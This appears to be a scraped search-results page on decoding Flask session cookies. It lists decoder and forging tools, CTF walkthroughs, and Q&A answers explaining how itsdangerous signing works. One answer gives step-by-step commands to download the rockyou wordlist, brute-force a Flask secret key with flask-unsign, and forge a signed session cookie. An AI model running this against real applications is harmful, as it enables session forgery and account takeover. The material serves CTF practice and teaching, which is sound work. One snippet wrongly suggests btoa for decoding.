🌐
Degoogle
kirsle.net › wizards › flask-session.cgi
Flask Session Cookie Decoder
Decode a Flask Session Cookie You can paste in your Flask session cookie here to decode it. Don't know how to get your cookie?
🌐
GitHub
github.com › noraj › flask-session-cookie-manager
GitHub - noraj/flask-session-cookie-manager: :cookie: Flask Session Cookie Decoder/Encoder · GitHub
Flask Session Cookie Decoder/Encoder positional arguments: {encode,decode} sub-command help encode encode decode decode optional arguments: -h, --help show this help message and exit
Starred by 774 users
Forked by 93 users
Languages   Python 88.9% | Shell 11.1%
🌐
Ari
ari.lt › tools › flaskcookie
Tools - FlaskCookie - ari.lt
Decode Python Flask session cookies online and display their detailed information.
🌐
Noraj
noraj.github.io › flask-session-cookie-manager
Flask Session Cookie Decoder/Encoder | flask-session-cookie-manager
usage: flask_session_cookie_manager{2,3}.py decode [-h] [-s <string>] -c <string> optional arguments: -h, --help show this help message and exit -s <string>, --secret-key <string> Secret key -c <string>, --cookie-value <string> Session cookie value
🌐
Readthedocs
flask-cookie-decode.readthedocs.io › en › latest › readme.html
1 flask-cookie-decode — flask-cookie-decode 0.4.3 documentation
Adds a cookie command to the built-in Flask CLI which will provide various tools for debugging the secure session cookie that Flask uses by default. flask cookie decode: decodes and verifies the signature of the session cookie
🌐
PyPI
pypi.org › project › flask-cookie-decode
flask-cookie-decode · PyPI
Adds a cookie command to the built-in Flask CLI which will provide various tools for debugging the secure session cookie that Flask uses by default. flask cookie decode: decodes and verifies the signature of the session cookie
      » pip install flask-cookie-decode
    
Published   Mar 09, 2025
Version   0.4.3
🌐
Pentesttools
pentesttools.net › flask-session-cookie-manager-flask-session-cookie-decoder-encoder
Flask-Session-Cookie-Manager – Flask Session Cookie Decoder/Encoder – PentestTools
August 12, 2020 - usage: flask_session_cookie_manager.py decode [-h] [-s <string>] -c <string> optional arguments: -h, --help show this help message and exit -s <string>, --secret-key <string> Secret key -c <string>, --cookie-value <string> Session cookie value
Top answer
1 of 2
11

As Elias has already mentioned, the cookie can be decoded without the secret key, but it cannot be manipulated without it for obvious security reasons. If cookie tampering was as easy as that, nobody would use Flask sessions. Therefore, your task is to find the secret key, and since the SHA-1 hash function is non-reversible, you should turn your attention to the human factor.

That being said, you'll have to "guess" the secret key of the contest's careless programmer using brute force, and fortunately, Flask-Unsign can assist you with that.

You can install it via pip by using the following command:

pip3 install flask-unsign

but before using it, you will need a wordlist like rockyou, which you can download from the Kali Linux GitLab repository by using a command like the one below:

curl -JO https://gitlab.com/kalilinux/packages/wordlists/-/raw/kali/master/rockyou.txt.gz && gunzip rockyou.txt.gz
  • -J, --remote-header-name: Uses the server-specified Content-Disposition filename instead of extracting a filename from the URL when saving the file locally.
  • -O, --remote-name: Writes the output to a local file named like the remote file obtained, using the server-specified filename.

Now you can perform the brute force attack using the following command:

flask-unsign --unsign --cookie '.eJwtjkGKAzEMBL-S9TkHy5Yte96wP1jCIEvyJmxIYDxzCvn7-pBTUw1N18ut_c7jasMtPy932me4cYjYGO7svp-_t8fpw_24f7nL-3Kem83G1S37dtikm7rFQUJBRSOL1GKWVCoRC3ED7VAz9FKsVi9aO2RgJmgSi88VuQCmXghjaRZjSCqBDTm3qE1LAh8bGnuG3jAHCV4iZlAoPkhiAGghT9v1GLZ9bCbK2Pq6P__sMQuev2ZcKQFkMinJWhRSqB4hYyWv2oWre_8D5vtQyA.ZTUbZQ.erv_yZmYg44tiaJ0u8fqKailHUc' --no-literal-eval -w rockyou.txt   
  • The --no-literal-eval argument was used because Flask-Unsign assumes by default that each word in a given wordlist is enclosed in quotes. However, this is not the case with the rockyou wordlist.

and find the secret key after a few thousand attempts:

[*] Session decodes to: {'_flashes': [('success', 'Login successful!')], '_fresh': True, '_id': '154c4d4e7e37b36c58977ac7ab1df1961f88e990cd9f161aa71bc380694a8145f87438be3325dc2ae4a6b3dbd85103b4ea0a1fb462c20c3461d1802c5a111b26', '_user_id': '1', 'csrf_token': 'acd9eea9751167ec85eb3c7d1904164970ddfca9'}                       
[*] Starting brute-forcer with 8 threads..                                                                                                     
[+] Found secret key after 175360 attempts                                                                                                     
b'Galaxy'

Finally, having found the secret key, you can use it to sign your own cookie with modified session data according to your needs:

flask-unsign --sign --cookie "modified session data here" --secret 'Galaxy'
2 of 2
1

What you described is the expected behavior by design - the cookie can be decoded without the secret key, but it cannot be modified without it.

from documentation:

If you have set Flask.secret_key (or configured it from SECRET_KEY) you can use sessions in Flask applications. A session makes it possible to remember information from one request to another. The way Flask does this is by using a signed cookie. The user can look at the session contents, but can’t modify it unless they know the secret key, so make sure to set that to something complex and unguessable.

Find elsewhere
🌐
Medium
medium.com › @ahmednarmer1 › ctf-day-43-1a92e694ba8a
CTF Day(43). picoCTF Web Exploitation: Most Cookies
July 24, 2025 - The first part contains the session data ({“very_auth”:”snickerdoodle”}), while the signature is generated using a secret key to ensure the data hasn’t been tampered with. Our goal is to discover this secret key using a tool like flask-unsign
🌐
YouTube
youtube.com › cryptocat
Decoding, Brute-Forcing and Crafting Flask Session Cookies - "web-intro" [DefCamp CTF 2022] - YouTube
Video walkthrough for the "web-intro" challenge from the @DefCampRO Capture The Flag (D-CTF) competition 2021/2022. In this challenge we brute-force a Flask ...
Published   February 13, 2022
Views   4K
🌐
Flask Unsign
flask-unsign.vercel.app
Flask Unsign - Online Flask Session Cookie Decoder & Inspector Tool
This tool lets you paste any Flask session token and instantly decode the base64-encoded payload, detect zlib compression, extract embedded timestamps, and visualize the full JSON session data - all without sending anything to a server.
🌐
Hexmos
hexmos.com › freedevtools › tldr › common › flask-unsign
Flask-Unsign - Control Flask Sessions | Online Free DevTools by Hexmos
Control Flask sessions with Flask-Unsign. Decode, brute-force, and craft Flask session cookies. Free online tool, no registration required.
🌐
Hyperskill
hyperskill.org › learn › step › 33914
Flask Sessions - Decoding
Hyperskill is an educational platform for learning programming and software development through project-based courses, that helps you secure a job in tech. Master Python, Java, Kotlin, and more with real-world coding challenges.
🌐
GitHub
github.com › rgcalsaverini › flask-session
GitHub - rgcalsaverini/flask-session: A tiny tool to decode, encode and brute-force flask sessions · GitHub
This is a tiny tool, service and chrome extension to decode, encode and brute-force flask sessions.
Author   rgcalsaverini
🌐
GitHub
gist.github.com › babldev › 502364a3f7c9bafaa6db
Decode a Flask Session cookie, given the cookie and secret key · GitHub
Decode a Flask Session cookie, given the cookie and secret key - decode_flask_cookie.py
🌐
Xin Fu
imfing.com › til › decode-flask-session-cookie
Decode Flask session cookie | Xin Fu
January 4, 2023 - Here’s a short Python snippet that decodes the session cookie using zlib and base64.urlsafe_b64decode. import zlib import base64 def decode(cookie): """Decode a Flask cookie.""" try: compressed = False payload = cookie if payload.startswith('.'): compressed = True payload = payload[1:] data = payload.split(".")[0] data = base64.urlsafe_b64decode(data) if compressed: data = zlib.decompress(data) return data.decode("utf-8") except Exception as e: return "[Decoding error: are you sure this was a Flask session cookie?
🌐
PyPI
pypi.org › project › flask-session-decoder
flask-session-decoder · PyPI
Once installed, you can import and instantiate the decoder like this: from flask_session_decoder import FlaskSessionDecoder decoder = FlaskSessionDecoder(secret_key="the-secret-key-of-the-flask-app-that-created-the-cookie")
      » pip install flask-session-decoder
    
Published   Dec 16, 2022
Version   0.1.0
🌐
saruberoz' site
saruberoz.github.io › flask-session-cookie-decoder-slash-encoder
Flask session cookie manager – saruberoz' site
""" Flask Session Cookie Decoder/Encoder """ __author__ = 'Wilson Sumanang' # standard imports import sys import zlib from itsdangerous import base64_decode # external Imports from flask.sessions import SecureCookieSessionInterface class MockApp(object): def __init__(self, secret_key): self.secret_key = secret_key def session_cookie_encoder(secret_key, session_cookie_structure): """ Encode a Flask session cookie Example: cookie_structure = dict( gplus_id = 1285135705050360459231, email = john.doe@gmail.com, user_info = dict( full_name = john doe, ) ) session_cookie_encoder(b'development key',
Top answer
1 of 2
20

The default session is implemented using secure cookies. Cookies are persisted by the client's browser, Flask doesn't do anything in that regard. Each client has a unique session cookie, which it sends to the Flask server with each request.

The cookie is secure not encrypted, it does not prevent anyone with the cookie from viewing the data, only from modifying it. Flask signs the data with the app's secret key when sending it, and unsigns it with the same key when reading it.

Flask does not add anything to the session. There is no session id, the browser just sends the session cookie during each request, and Flask reads it.

You can write your own session interface to change how the session works. See extensions such as Flask-Session

2 of 2
9

Flask generates the session cookie using its sister project, It's Dangerous. The project page has a great overview of how It's Dangerous works, but at a high level:

  • the data in your session (set by session["username"] = "EndenDragon") is serialized into a JSON string ({"username":"EndenDragon"})
  • that string is encoded using base64 encoding (eyJ1c2VybmFtZSI6IkVuZGVuRHJhZ29uIn0=). This makes it safe for use cases like an email verification link, where it might be appended at the end of the link.
  • the base64 encoded data has a "." appended to it. The timestamp when the session was created is base64 encoded and appended to it.
  • A cryptographic signature is generated for the session + timestamp, using your secret key. The signature to the session value after a "." as well.

The value is then sent to the browser as a Cookie in the response.

The values in the session can be read by end users (and over insecure connections). The server can verify cookies it receives hasn't been tampered with, without storing anything on its end. It just recomputes the signature from the session + timestamp part of the session value, and makes sure it matches the signature at the end of the session value.

The inclusion of the timestamp enables Flask to enforce the expiration date of permanent sessions on the server side, in addition to setting an expiration date on the client side.

Addendum

Users can easily read the values in the session by decoding the first part of the session value. Go to the "Storage" or "Application" tab in developer tools, look for the "session" cookie, copy the value up to the first period, and run btoa(<session-part>) in the Console.